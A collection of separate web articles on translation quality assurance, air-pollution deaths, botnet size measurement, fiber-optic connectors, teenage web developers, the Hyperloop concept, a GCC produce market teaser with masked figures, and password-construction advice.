Six translations later (from English to Bulgarian and back to English and into Korean, etc.), the translator spat out:
“I’d rather act with the translation of a sentence.”
Granted, there is no such thing as a perfect translation, and there's a good reason for that. By its very nature, translation is a subjective activity. Language is fluid and open to interpretation. But we can take measures to make translations as accurate as possible.
There are various factors informing the quality of any given translation. One, of course, is skill in the language. Another is personal bias, which you can find almost everywhere, from theological opinions carrying over to Biblical translations to modifying news reports in a way that slants them differently than the source report.
Many biases and mistranslations are relatively harmless. But high-stakes agencies of the government can’t afford to misjudge their translations. If, for example, the government receives information about an emergency abroad, and there’s a mistranslation, relief efforts could be miscoordinated, and lives put at stake.
How Do We Assure Quality Translations?
Quality assurance is systemized in various layers of government. The FCC, which is in charge of all of the communication spectrum in the country, conducts ongoing tests to ensure that there’s no overlap between radio waves, TV stations, Wi-Fi, local broadcast and other frequencies. Based on those tests, they draw conclusions and put out new standards for each spectrum. In the same vein, the USDA has standards for food handling, the FAA for airplane safety and NIST for standards in the fields of science and technology.
Yet there are no cross-agency standards in translation, and there is no system of quality assurance for overall accurate translation. One reason is that translation is less objective than broadband or bacterial growth. Because language contains so many possibilities for interpretation, it is difficult to adopt black-and-white standards for the acceptance or rejection of content. There are, however, opportunities to use technology in novel ways to accomplish a different kind of quality assurance.
Standards for Translation
In order to create standards for translation, machine translation (MT) and humans must work together. MT still doesn't work well as a standalone technology; in order to generate accurate translations, human translators must be involved. Yet human translators have their own biases, and you can't yet trust a machine to generate the most accurate result. So how do you build real quality controls into your translation system?
In my experience, it helps to have several key components in place:
1. Measure translation quality. If you can’t measure a thing, chances are, you won’t have the foundation to improve it. In my work with the federal government, I’ve found that measurement is limited to the number of words translated each month. It would help greatly to know what’s trending, which people focused on what content, or what the volume of translations was in each area of focus. Such measurements help facilitate a better understanding of the process of their translations—and help users know what to improve.
2. Build a language model. A language model is anything that represents the properties of a language. Language models are ubiquitous, from Microsoft Word's grammar checker to autocomplete on your smartphone. Building a language model for translation could involve identifying translators who consistently generate quality results, throwing their work into a big data bucket, and counting how many times a certain word or phrase translates into another (see the sketch after this list). That way, as translators start to type, the translation platform can insert predictive text completion—autocomplete—for translations, offering suggestions based on the most likely next word or phrase to appear.
3. Use the cloud. Most ingrained translation management systems have no way to centralize data and run translation as a big data problem, because they’re not on the cloud. Without the cloud, it becomes difficult to measure and build language models, because there’s simply not enough data for the system to decipher quality results. If the government could focus on cloud-based translations, quality assurance and integrating standards would become a much easier process. Siloes of translation measurement could also be shared more easily in the cloud. If one agency has a solid set of standards for translating terminology, they could use the cloud to share it with another agency.
Once these pieces are in place, technology can be adapted to enable translators to, in aggregate, produce a higher-quality result. Bias and lack of skills will never be completely eliminated, but with the right technology, we can certainly control for them. | <urn:uuid:5bb4c58f-2e28-4974-9fe3-ebf05fdb775e> | CC-MAIN-2017-04 | http://www.computerworld.com/article/2474990/government-it/ridding-ourselves-of-poor-translations.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00073-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947923 | 1,038 | 2.65625 | 3 |
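To make item 2 concrete, a count-based language model for translation suggestions can start as nothing more than a table of observed source-to-target phrase pairs. A toy Python sketch (the phrases are invented examples):

from collections import Counter, defaultdict

class PhraseModel:
    # Suggest target phrases ranked by how often trusted translators used them.
    def __init__(self):
        self.table = defaultdict(Counter)

    def observe(self, source, target):
        self.table[source][target] += 1

    def suggest(self, source, n=3):
        return [t for t, _ in self.table[source].most_common(n)]

model = PhraseModel()
model.observe("carte d'identité", "identity card")
model.observe("carte d'identité", "identity card")
model.observe("carte d'identité", "ID card")
print(model.suggest("carte d'identité"))  # ['identity card', 'ID card']

Fed with enough vetted translation pairs shared through the cloud, the same counts can drive the autocomplete behavior described above.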
New research underscores what any rational human being would conclude on their own: Inhaling toxic air over a long period of time is deadly. But how deadly is what's truly astonishing. The study by an international team of scientists, published in the Environmental Research Letters journal, concludes that more than 2 million people around the world die each year because of polluted air. "Our estimates make outdoor air pollution among the most important environmental risk factors for health," Jason West, an environmental science professor from the University of North Carolina and one of the study's many authors, said in a statement. The study team said the "increased concentrations of ozone and fine particulate matter since preindustrial times reflect increased emissions, but also contributions of past climate change." Researchers created chemistry-climate models for the years 2000 and 1850 (dawn of the industrial era) to determine the impact of outdoor air pollution across the globe. Here's what the team says in the paper's abstract:
Using simulated concentrations for 2000 and 1850 and concentration–response functions (CRFs), we estimate that, at present, 470 000 premature respiratory deaths are associated globally and annually with anthropogenic ozone, and 2.1 million deaths with anthropogenic PM2.5-related cardiopulmonary diseases (93%) and lung cancer (7%).
Air pollution tends to be worse in high-population areas such as China and India. Two studies released last week also painted a grim picture of air pollution's deadly impact around the world. In a study of lung cancer cases across Europe, researchers concluded that any kind of air pollution is dangerous. From NBC News:
Dr. Ole Raaschou-Nielsen of the Danish Cancer Society Research Center said they couldn't find a "safe" level of air pollution. The more pollution, the higher the risk, even at legally accepted limits. The European team looked at data from 17 different studies involving more than 300,000 people in nine European countries. Over 13 years, 2,095 people developed lung cancer.
Researchers determined that an extra five micrograms of soot per cubic meter of air increased the average person's chances of getting lung cancer by 18%. The second study, published last week in the medical journal Lancet, explored the impact of air pollution on heart failure. Increasing the amount of carbon monoxide by only 1 part per million raises the risk of heart failure by 3.5%, while raising the level of particulate matter by 10 micrograms per cubic meter increases the risk by 2%. Now read this: | <urn:uuid:90bacef8-b5e6-4891-835a-dabf639ecf7a> | CC-MAIN-2017-04 | http://www.itworld.com/article/2707226/enterprise-software/air-pollution-s-deadly-toll--more-than-2-million-people-each-year.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00102-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.926706 | 513 | 3.0625 | 3 |
The main metric with which security researchers identify how effective and disruptive specific botnets are is the number of computers they consist of.
Estimating their size allows them to assess whether concentrating their efforts on the disruption of one is better than focusing on “attacking” another, and to estimate which resources they will have to dedicate to this task.
But measuring the size of a botnet once is not enough. It has to be done over and over again, as the number of zombie computers it consists of changes with each passing day. This continuous effort also allows researchers to see whether and in what measure their efforts have been successful.
In a recent blog post, Jose Nazario, senior manager of security research at Arbor Networks, gave insight into a number of measurement methodologies researchers use to effect that task.
Sinkholing a botnet by identifying its C&C server and redirecting infected computers to a server controlled by the researchers is a very popular technique at the present moment. Not only can they then count the number of unique IP addresses that connect to it in a certain period, but they can also sometimes identify whether there is more than one PC on one IP address.
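In its simplest form, the counting step reduces to de-duplicating the IP addresses seen at the sinkhole per time bucket. A minimal Python sketch (the log format is assumed; the caveats discussed further below still apply):

from collections import defaultdict

def daily_unique_ips(records):
    # records: iterable of (date_string, ip) pairs from sinkhole logs.
    per_day = defaultdict(set)
    for day, ip in records:
        per_day[day].add(ip)
    # Unique IPs per day: a rough lower bound on the botnet's footprint.
    return {day: len(ips) for day, ips in sorted(per_day.items())}

print(daily_unique_ips([
    ("2012-05-01", "198.51.100.7"),
    ("2012-05-01", "198.51.100.7"),   # the same bot checking in twice
    ("2012-05-01", "203.0.113.9"),
]))  # {'2012-05-01': 2}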
Dark IP monitoring consists of a completely different approach. “This method takes large unused IP address blocks and then listens for traffic,” explains Nazario. “The collection system is able to fingerprint bots based on specific signs. This could include the exploit traffic or traffic to a specific TCP/IP service used. This then gives you some passive mechanism to watch the botnet and try to spread.”
A third methodology – counting infected hosts – is more direct than the previous ones, and is often employed by Microsoft as the company can dip into the reports sent by its AV solutions such as the Malicious Software Removal Tool. Still, only Microsoft can effectively use this method, as AV solutions by other vendors are not that widely and uniformly distributed around the world.
Crawling a peer-to-peer botnet in order to gather the peer list from every node and walk the botnet recursively is also a good and direct option, but in order to do it, researchers must know the P2P protocol it uses – and it must not be strongly encrypted.
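The crawl itself is just a graph traversal over peer lists. A schematic Python version, where get_peer_list() stands in for a client that speaks the botnet's reverse-engineered, unencrypted protocol:

def crawl_botnet(seed_peers, get_peer_list):
    # Walk the peer-to-peer network outward from a set of seed nodes.
    seen = set(seed_peers)
    frontier = list(seed_peers)
    while frontier:
        peer = frontier.pop()
        for neighbor in get_peer_list(peer):  # ask the node for its peers
            if neighbor not in seen:
                seen.add(neighbor)
                frontier.append(neighbor)
    return seen  # every node reachable from the seeds = the size estimate

graph = {"A": ["B"], "B": ["C", "A"], "C": []}
print(crawl_botnet(["A"], lambda p: graph[p]))  # {'A', 'B', 'C'} (order varies)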
Unfortunately, the effectiveness of each of these methodologies can be thwarted by a number of things.
ISPs could be directing affected computers to their own sinkholes to identify and help their own infected customers, so the sinkholes set up by the researchers don’t catch all the IPs. If a bot is offline, it won’t be contacting the sinkhole and will not, therefore, be counted.
Finally, the gathered IP addresses are not always equivalent to one affected computer each. The IP address of a single machine can change multiple times per day, leading to an overcount.
On the other hand, Network Address Translation (NAT) can account for significantly smaller numbers recorded, as in some parts of the network up to a hundred PCs share the same IP address.
Obviously, none of these measurement methodologies are perfect.
“We’re trying to identify the causes for the gaps in the methodologies (e.g. network vs host measurements) and provide stronger data by closing those gaps,” Nazario concludes.
“Based on this data, we also work globally to identify working strategies that effectively shut down botnets and drop infection rates. We then want to coordinate these efforts globally to lead to lower infections in each region.” | <urn:uuid:e350b5a6-5b25-4238-924c-fcb2360233cc> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2012/05/03/the-difficulties-in-sizing-up-botnets/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00496-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95433 | 718 | 2.765625 | 3 |
Fiber connector types include SC and ST for 1Gb Fibre Channel, Gigabit Ethernet, ESCON, and FICON. A smaller form-factor GBIC, about the size of a networking RJ45 (Ethernet) connector, is the Small Form-factor (SFF); a Small Form-factor Pluggable (SFP) connector is used with 2Gb and 4Gb Fibre Channel, although some products utilize SFPs for 1Gb applications. SFF and SFP are sometimes referred to as LC connectors. Fibre Channel supports copper and fiber optic interfaces (most implementations are now optical). Fibre Channel utilizes various cable types, including 62.5 and 50 um (micron) Multi-Mode Fiber (MMF) and 9 um Single-Mode Fiber (SMF). Trunk cable is used to physically combine multiple cable strands into a single cable bunch that fans out at each end or has a special connector to attach a fan-out cable (e.g., MTP cable). Some common fiber optic connector types are shown below. Duplex connectors have two connections attached to each other (a pair), whereas simplex connectors are individual.
This figure includes LC, SC, simplex (single connector), and duplex (a pair of fiber connectors). Two other fiber optic connector types are ESCON Duplex and MIC (FDDI), which are used for ESCON and FDDI configurations, respectively. Various cable and jumper configurations are available, including SC to SC, SC to LC, LC to LC, SC to ST, Simplex, Duplex, and LC to MT-RJ, to name a few. There are also mode conditioners, which enable different types of fiber optic cabling to coexist, for example, using existing ESCON cables for 1Gb FICON. Connectors, cables, and other fiber optic accessory items are available from a variety of sources.
Caution: Fiber Optic Care and Handling: Fiber optic cable is relatively flexible compared with traditional bulky storage interfaces and even the Unshielded Twisted Pair (UTP) copper cabling used with networking. However, fiber optic cabling is sensitive to bending and sharp turns as well as dust and dirt. Keep your fiber optic connectors clean, and if you plan on making many changes that involve unplugging and replugging connectors, invest in a quality cleaning kit. As part of managing your fiber optic infrastructure, avoid sharp bends and twists in your cabling to prevent damage to the core. Cable bend-radius guides can be used to help protect cabling.
Fibre Channel and Ethernet borrow and leverage technologies from each other, particularly at the physical layer. 1Gb Ethernet utilizes fiber optic transmission (8B/10B encoding) technology borrowed from Fibre Channel, with Ethernet operating at a faster clock rate. 1Gb Ethernet has a slight theoretical wire-speed advantage of 1.25 Gbps compared with 1.0625 Gbps for Fibre Channel, which works out to about a 150 Mbps difference in data rate. Some Fibre Channel and Ethernet 1Gb GBICs are interchangeable and support dual clock rates; however, this varies by manufacturer and vendor-supported configurations. At 10Gb, Fibre Channel borrows from Ethernet, using a common encoding and transmission scheme, including virtual lanes and common coding (64B/66B).
Similar to fiber optic cabling having different types for short- and long-haul applications, fiber optic transceivers also have different characteristics and capabilities. Here is a table that shows some common fiber optic transceivers and their characteristics, including cable type and connector type along with supported distance. Fiber optic transceivers include the Gigabit Interface Converter (GBIC) for 1Gb, SFPs for 100Mb to 4Gb, and the 10 Gigabit Small Form-factor Pluggable (XFP) and SFP Plus (SFP+) for 10Gb applications. Note that some fiber optic transceivers, including GBIC, SFP, SFP+, and XFP modules, are interchangeable between Fibre Channel and Ethernet devices; however, consult the manufacturers' material for specific guidelines and supported configurations. Media Interface Adapters (MIA) can be used to convert from copper electrical interfaces to optical.
Transceivers are also used with DWDM technology for transmitting and receiving light over various distances and at different wavelengths. For diagnostic, monitoring, and test purposes there are also loop-back transceivers, which simply take the transmit signal and loop it back to the receiver. There are also snoop transceivers, which have an extra connection pair for attaching optical test tools, sniffers, analyzers, and performance probes. Snoop GBICs bleed off a small amount of the light source and send it to the extra monitoring port for use by diagnostic and monitoring tools. This allows fiber optic and interface analyzers to look at and collect traffic information for diagnostic and troubleshooting applications. Performance analyzers and probes can also be attached to these ports to collect detailed session-level statistics from the network interface up to the protocol layer. This would include SCSI, IP, VI, and FICON reads, writes, I/O size, source, destination, response time, signal and synchronization loss, and other pertinent data to aid management, storage resource management, and capacity planning. Another technique for tapping into a fiber optic stream without using snoop GBICs and SFPs is to use a "Y" splitter cable, sometimes called a pigtail cable or splitter device, which is essentially a "Y" in a small connector box.
An emerging trend is to have extra ports, called mirrored ports and spanning ports, available, similar to Ethernet switches. Another emerging trend is to have the information from the port itself sent in-band to management software. Analyzers are good for collecting very detailed state information with some retention capabilities, while probes and sniffers tend to take a higher-level view, providing analysis capability, long-term retention of data, and reporting/display capabilities. Depending on your specific needs, you may need both, one or the other, or perhaps neither. From an educational standpoint, it certainly helps to have at least some exposure and training, even if it is only a demonstration of what these tools can do and how they can be used to help you better understand your storage networking environment and troubleshoot issues.
There is another specialized type of transceiver: the wavelength- (lambda-) specific GBIC or SFP, sometimes called a CWDM GBIC or CWDM SFP. Regular transceivers transmit light at a common wavelength or light level. Using CWDM technology, different transceivers can have different wavelengths assigned to them, for example, at 20 nm ITU grid spacing. Each wavelength must be aligned with its corresponding wavelength at the far end or the transceivers will not communicate. By using Optical Add-Drop Multiplexer (OADM) devices, the various wavelengths are combined to create a multiplexed light source and transmitted over single-mode fiber optic cabling. The light is demultiplexed at the far end back into the individual wavelengths and sent to the wavelength-specific transceiver.
The figure below shows an example of wavelength-specific transceivers based on CWDM technology with an ITU grid spacing of 20 nm and an OADM. In this example, a server on the left has a wavelength-specific transceiver operating at 1470 nm that is multiplexed with other wavelengths for long-haul transmission using SMF optical cabling. On the right, the combined light source is demultiplexed by the OADM and the appropriate wavelength is sent via fiber optic cable to the storage device. In this example there is a jumper cable (fiber patch cable) between the server and the OADM on the left, an SMF cable between the OADMs on the left and right, and a jumper cable between the OADM on the right and the storage device.
Another example, based on the same figure, would be to introduce switches (Ethernet, Fibre Channel, FICON) that servers and other devices attach to on both sides. The switches would then connect to an OADM device, using the wavelength-specific transceivers to multiplex their signals over a common SMF fiber optic cable. Consequently, multiplexing can be used to combine Fibre Channel and FICON for storage access and Ethernet for server access and clustering heartbeat over a common fiber optic cable for long-distance applications.
The entrepreneurial spirit is alive and well in the Junior and Senior High School students of Davis, Calif. Many of these students are engaged in creating Internet Web pages, and they are making money for their efforts.
Davis is home to the University of California at Davis. The city is full of bicycles, education, and computer technology and offers an ideal environment for developing the next generation of technological leaders.
This pleasant college town is another cul-de-sac on the information highway, tucked away behind a router. The Davis Community Network (DCN) serves as the Internet launch point for many of the city's young techies.
The ages of these Web wizards range from 13 to more than 18 years. One, who is too young to drive, has equipped his bicycle with a cellular phone. Because of their age, many bill themselves as consultants. This allows them to circumvent the archaic labor laws associated with employing children under age 16. In this situation, the labor laws have not kept pace with the advancements in technology. Writing HTML code for Web pages does not require a sweat-shop environment for these young workers. Working as consultants allows them to be paid for their efforts.
These youthful entrepreneurs command fees as high as $1,000 to set up a Web page. Their customers include various departments at UC Davis and businesses located on the bustling Davis Virtual Market (DVM) section of DCN. DVM is a very busy area, sustaining 308,454 hits last June.
Graham J.M. Freeman, a senior at Davis High School, develops Web pages and volunteers as a member of the DCN Web team. He learned to write Pascal code at Davis High School under the tutelage of computer teacher Janet Meizel. When the Internet explosion came along, he taught himself to write HyperText Markup Language (HTML) code. These ASCII instructions are used by Web browsers for displaying pages.
In the same fashion as other inquisitive programmers, he obtained and dissected existing HTML files. "If I see something I like, I view the source and try to determine how I can adapt that code without actually copying it," said Freeman.
For Freeman, content takes precedence over graphics. His pages are designed to be functional with all the popular browsers and platforms. The pages must be pleasing under Netscape, Explorer and Mosaic. Both Windows 3.x and Windows 95 platforms are used to test newly developed pages. Users of the text-only Lynx browser are also accommodated by Freeman's pages. He said, "I don't really rely too much on graphics. Eye candy has its place, but I personally don't want it."
Freeman noted that many personal Web pages are lacking in content, even his own. "I have a cat. I breathe," he joked. However, content was uppermost in his mind when he created a Web page for his mother's political campaign. During the campaign, her Web page received more than 30 hits per day. He noted this was low compared to commercial pages, but good for a local page.
In keeping with his preference for content, Freeman avoids gizmos and gadgets such as counters and animation. "Unobtrusive animations don't bother me. The ones that do bother me are those that keep reloading. The stop light goes on and off constantly," he said.
Counters are devices that keep track of the number of visitors to a given page. Counter programs usually reside on a remote server elsewhere on the Internet. When a user visits a counter-controlled page, a signal is sent to the counter server. The page count is updated, and a graphics image of an odometer showing the number of hits is sent back to the visited page and displayed. This lag time is often the reason the counter doesn't display until long after the page has finished loading.
Many coders are purists and avoid HTML visual creation tools like Hot Dog Pro. Freeman is no exception, as he prefers to write HTML directly in ASCII text. Adobe PhotoShop is one of the few tools used by Freeman. Its extensive editing and image manipulation functions seamlessly integrate HTML text and graphics. As he develops his code, he loads it directly into Netscape to see the results. Developing under Windows 95 is simpler than Windows 3.x, because of Windows 95's built-in Winsock function. Older versions of Windows require an external Winsock program such as Trumpet to be loaded before Netscape can operate.
Freeman is exposed to CGI scripts as part of his volunteer work with the DCN Web team. These scripts differ from HTML code in several ways. Unlike HTML, which executes on the client machine, CGI scripts execute directly on the server. Running CGI scripts requires the approval of the server administrator. Because they run directly on the server, they are potential security and system integrity risks. "CGI scripts are a lot more complicated," noted Freeman. Most are written in the Perl script language under UNIX, to perform interactive functions. Search engines, news retrieval and counters are common CGI applications.
Burnout is an issue on Freeman's mind. "HTML coders get burned out after awhile, like comics artists," he said. "It will be a sad day when the author of Dilbert burns out."
When asked about continuing with HTML coding, Freeman said, "It's oversaturated now. Everyone and their dog is providing Web service." Freeman wants a career outside the computer field, where his computer skills will be an asset to him. He is uncertain of his direction right now, but believes it will not be Web publishing.
Mark Baysinger is another Web page author and self-described computer freak, who graduated from Davis High School last year. He will be attending the University of California at San Diego this fall as a computer science major. Baysinger also studied under Janet Meizel at Davis High School. His programming career began early when his father brought home a Commodore personal computer. This machine was quickly outgrown, and gave way to an IBM-compatible machine.
Baysinger has done a lot of CGI script programming. One of his projects was the guest book for the Davis High School Web site. Another was an order form for a comic book vendor on DVM. He participated when Davis High School placed their newspaper, The Hub, online. His CGI scripts, written in Perl, took the news text files and formatted them with a table of contents.
PhotoShop is the artist's tool favored by Baysinger. He creates images with other tools then imports them into PhotoShop for touchup and text overlays. PhotoShop's GIF plug-in module exports the completed graphic to a GIF file as a transparent image. The "multiple layers" function in PhotoShop is important to him. He uses it to make drop-shadow effects.
For Baysinger, interactive screens are the most exciting part of Web page design. He said, "If you look at the Davis High School online newspaper and click on a page, it pulls the articles for that page. Clicking on an article formats it for the screen right there as you're looking at it."
Today, Baysinger is creating Web pages for DVM. He is uncertain about doing this in the future. "The people at DVM want me to continue," he said. "I don't know how much free time I'll have." His busy college schedule will probably limit the amount of time available for extra activities. Living out of town in San Diego won't pose a problem. He can still perform his Web page maintenance across the Internet.
Burnout is not a factor for Baysinger. There is always a new technology out there for him to examine and learn. The constantly changing face of the computer industry helps keep burnout to a minimum. "It's really hard to predict the future," noted Baysinger. "If we could, we'd all be Bill Gates."
Young entrepreneurs like Freeman and Baysinger are tomorrow's movers and shakers. They, and others like them, have taken technical skills and transformed them into the beginnings of promising careers. | <urn:uuid:a10954c5-8e4b-4a72-8b06-f8fe7e81b38d> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Young-Entrepreneurs-Cash-in-on-the.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00550-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.966469 | 1,656 | 2.96875 | 3 |
The idea with e-mail is this: If you abort the e-mail send (disconnect
before the session is complete) the e-mail is considered to be "aborted"
and not sent.
So you need to send the whole message, and successfully receive the
response that confirms that the server has sent it.
I would not use a sleep() to give it time to send the response, however.
I would just call recv() until you've received the whole thing. That
way, it takes only the time it needs to take to send the response...
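The same read-until-complete approach is easy to sketch outside RPG. In
Python with raw sockets (the host name below is just an example), an SMTP
reply is complete when a line arrives whose fourth character is a space,
e.g. "250 OK"; "250-..." lines are continuations:

import socket

def read_reply(sock):
    # Call recv() until one complete (possibly multi-line) reply arrives.
    data = b""
    while not (data.endswith(b"\r\n")
               and len(data.splitlines()[-1]) >= 4
               and data.splitlines()[-1][3:4] == b" "):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("server closed the connection")
        data += chunk
    return data.decode("ascii", "replace")

def send_cmd(sock, line):
    sock.sendall(line + b"\r\n")
    reply = read_reply(sock)   # blocks only as long as the server needs
    if int(reply[:3]) >= 400:
        raise RuntimeError(f"{line!r} rejected: {reply.strip()}")
    return reply

sock = socket.create_connection(("mail.example.com", 25))
read_reply(sock)               # 220 greeting banner
send_cmd(sock, b"HELO client.example.com")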
On 10/16/2012 8:16 AM, Victor Hunt wrote:
I share your feeling on the sleep() call. The program is fairly
straightforward. It opens a socket to our SMTP server. It then loads the various
SMTP commands into a string (one at a time) and runs a subroutine that does
the send() and recv() calls separated by a sleep() call.
I've been playing with the subroutine a bit. The data from the recv() call,
if any is even returned, is not used by the program. I commented out both
the sleep() and recv() calls. Nothing else was changed. The program no
longer sends an email. After uncommenting out the sleep() call, the email
is sent again.
This was late in the day and I didn't have time to do any debugging, which I
will do this morning to see if the send() call is failing for some reason.
Do the send() and recv() calls need to be used together? Can I do a send()
and never a recv()? At least as far as SMTP goes?
On Mon, Oct 15, 2012 at 4:57 PM, Scott Klement wrote:
It's hard to see how a sleep() call would help in sending an e-mail? I
could see using delays like this if you're using QtmmSendMail(), since
that program hands the file off to a background job which may take a
moment to handle the file
But if you're coding an SMTP client (i.e. coding your own SMTP routine
with the socket API) this should be a non-issue? Unless something
strange is going on?
On 10/15/2012 1:45 PM, Victor Hunt wrote:
I've run across an RPG program that uses socket APIs to send an email. Once
the socket is set up and opened, the program uses a subroutine to do all
send/receive functions. Just after the send, the subroutine runs the sleep()
API with a parameter of 1 second. It appears the original intent was to
give the email server and/or network time to produce/deliver a response
before the receive API runs. Does anyone think this built in delay is
really necessary? Depending on what is being sent, this program can run
a very long time with these roughly 1 second delays. Also, the program
doesn't do anything with the received data collected after the send API.
Is it really necessary to do a receive after a send? Seems I can tighten
up a bit.
Instead of boarding a plane for your next business trip, ever think you might make the journey inside a solar-powered, car-sized aluminum pod shooting through a steel tube?
And you might get from Los Angeles to San Francisco in just 30 minutes?
That's the vision of Elon Musk, chief executive of electric car maker Tesla Motors and SpaceX, which has run two successful missions contracted by NASA to deliver scientific experiments and supplies to astronauts on the International Space Station.
If most people started talking about high-speed transportation inside a large tube, few would pay attention. Musk, however, is an entrepreneur who has made big things happen, such as being the first company to build and run essentially a commercial space taxi for NASA.
Musk is behind the idea for what he's calling Hyperloop, an elevated, city-to-city transportation system that would travel at speeds of more than 700 mph.
"Short of figuring out real teleportation, which would of course be awesome (someone please do this), the only option for super fast travel is to build a tube...," Musk wrote in a post on the SpaceX site. "Hyperloop is a new mode of transport... both fast and inexpensive for people and goods. Hyperloop is also unique in that it is an open design concept, similar to Linux. Feedback is desired from the community that can help advance the Hyperloop design and bring it from concept to reality."
In Musk's plan, Hyperloop consists of a low-pressure tube with capsules that hold up to 28 passengers and shoot through the tubes at either low or high speeds. The capsules, or pods, are supported on "a cushion of air" created by pressurized air and aerodynamic lift. Acceleration would be created by a powerful fan at the front of the pod sucking air in the front and expelling it at the rear.
Passengers would be able to enter and exit the capsules at either end or from various branches along the tube.
The initial plan was set up for a system that runs from Los Angeles to San Francisco, with capsules departing as often as every 30 seconds. According to Musk's plan, that could transport 7.4 million people each way annually.
So is there any real chance of one day traveling from L.A. to San Francisco, or Boston to Washington D.C., inside a pod shooting through a tube?
Well, some industry analysts say, Why not?
"I like it. It's bold, yet workable," said Dan Olds, an analyst with The Gabriel Consulting Group. "There will be a lot of special interests who will work to snuff it out, but it's a good idea and deserves more exploration. It could make business travel more affordable, and also allow people to live farther away from their jobs."
He added that for frequent business travelers, this could quickly get them from city to city without a trip to the airport.
"The other consideration is that much of the energy used could be harvested from solar cells lining the outside of the tube," said Olds. "The science behind it is sound. Assuming it can be built, it has the potential to move more people faster than any alternative -- and at a lower cost as well."
Zeus Kerravala, an analyst with ZK Research, said once the project gets beyond the funding and building stage, there are some strong positives to the idea.
"I think a faster mode of transport would be well received," he added, calling Musk "futuristic." "Frankly, I think it would great. Anything to save on travel time would be welcomed. I think initially there would be some concern, but once people started using it, I'm sure it would be mainstream."
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld.
This story, "Hyperloop tube travel may be more than a pipe dream" was originally published by Computerworld. | <urn:uuid:ae2ec1ff-5505-4205-83a0-219fb2179ff1> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2169029/data-center/hyperloop-tube-travel-may-be-more-than-a-pipe-dream.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00000-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.966281 | 940 | 3.21875 | 3 |
Total food consumption in the GCC is expected to reach 52.3 million metric tons by 2021. The fruit market in the region reached XXX thousand metric tons in 2016, having increased at a CAGR of X.XX% from 2010 to 2016, and is expected to grow at XX.XX% YoY through 2021. The vegetable market in the GCC reached XXX thousand metric tons in 2016, having increased at a CAGR of X.XX% from 2010 to 2016, and is expected to grow at a CAGR of XX.XX% through 2021. The increase in consumption of fruits and vegetables is attributed to the growing expatriate population and the economic prosperity of the region. Among the GCC countries, the UAE has the highest expatriate population; about 85.5% of its residents are non-nationals. The same phenomenon is seen in all the GCC countries.
Conditions in the GCC countries are unfavorable for the cultivation of most fruits and vegetables. Of the total area available, only about 1.7% is arable. Because of this, domestic production levels are low, and most of the consumption is met by imports from various countries. As consumption of fruits and vegetables grew, the GCC countries tried to boost agricultural output by increasing productivity so that they could be self-sufficient. They could not sustain this level of production due to the scarcity of water resources, which in turn increased these countries' reliance on imports of fruits and vegetables. Because of the water issue, domestic production in the GCC countries will never be able to satisfy domestic consumption.
The signing of GAFTA and other free trade agreements will open up different avenues of trade and procurement. GAFTA is expected to boost both intra-GCC and intra-MENA trade. The governments of the GCC countries have undertaken several food security initiatives, framing policies that encourage private investment in the agricultural sector. They have also begun implementing policies that phase out domestic production of crops that need large amounts of water. This makes the GCC a prime market for exporters of fruits and vegetables. Following a recent land privatization law passed in Africa, most of the GCC governments have invested in obtaining land in Africa and producing fruits and vegetables for their countries. Many private organizations are trying to follow the same model, as demand for fruits and vegetables is high in the GCC countries.
The agricultural market in Iran is segmented by type of products into fruits and vegetables. These are sub-segmented into onions, potatoes, tomatoes, garlic, cauliflower, cucumber, cabbage, beans, eggplant, lemons, apples, bananas, oranges, grapes, strawberry, watermelon, grapefruit, dates, and olives.
There's some speculation among experts. Why Facebook? Has Facebook become a keystone from which to launch and steal all of an individual's passwords (i.e. banking and commerce sites)? Once you have Facebook, can you then compromise the primary e-mail account and everything else along with it?
Let's take Finland as an example. There are over one million estimated Facebook accounts and there are only 5.3 million people living in Finland. The regional network has over 544,000 members. Anything that size will be a target for scammers.
Wherever good people go, miscreants will follow.
So of course it's an excellent policy to maintain complex passwords that are unique to each site. Right?
Here's an idea. Write down your passwords. Seriously.
And once you write them down, put them in your wallet. Think about it. What else do you carry in your wallet? That's right, your bank cards. And your bank cards contain your account name and account number.
That's kind of like your online account names and passwords.
Only this is the key — It's a two part password. Because your account name and bank card number also requires your PIN.
So take a look at this screenshot. What do you see?
Passwords on a Post-it, only examples of course… non-dictionary ones at that.
Keep another three common characters in your head, and you'll have complex 10 character passwords. And you can insert those extra characters in the front, middle, or end.
What do we mean? It's like this.
The first three characters in this example are based on the website, "aMA" represents Amazon.com. And it can be written several ways, such as "AMa" or "aMa" or "AMA", etc. A good method should be easy for you to remember.
The next (or other) part, "2242" as in our example, should be something completely random. This is the part that you really need to write down and keep safe so that you don't forget it.
And then you should use a method to add three more characters (your "PIN") to every password. Something such as "35!" So the full password then becomes "aMA224235!" or "aMA35!2242" or "35!aMA2242".
Our other example would be "gMA35N135!".
Your PIN should never be written down, keep that bit of information in your head. Just like your bank card's PIN.
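The scheme is simple enough to mechanize. A toy Python sketch of one variant (site tag plus random digits on the Post-it, memorized PIN appended at the end; the tag rule and PIN shown are examples, not recommendations):

import secrets
import string

PIN = "35!"  # memorized only -- never written down

def site_tag(domain):
    # Derive a 3-character tag from the site, e.g. amazon.com -> "aMA".
    name = domain.split(".")[0]
    return name[0].lower() + name[1:3].upper()

def new_password(domain):
    random_part = "".join(secrets.choice(string.digits) for _ in range(4))
    on_postit = site_tag(domain) + random_part  # this part goes in your wallet
    return on_postit, on_postit + PIN           # the full password adds the PIN

note, full = new_password("amazon.com")
print(note, full)  # e.g. aMA2242 aMA224235!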
Note that our example does not include an e-mail address on the Post-it.
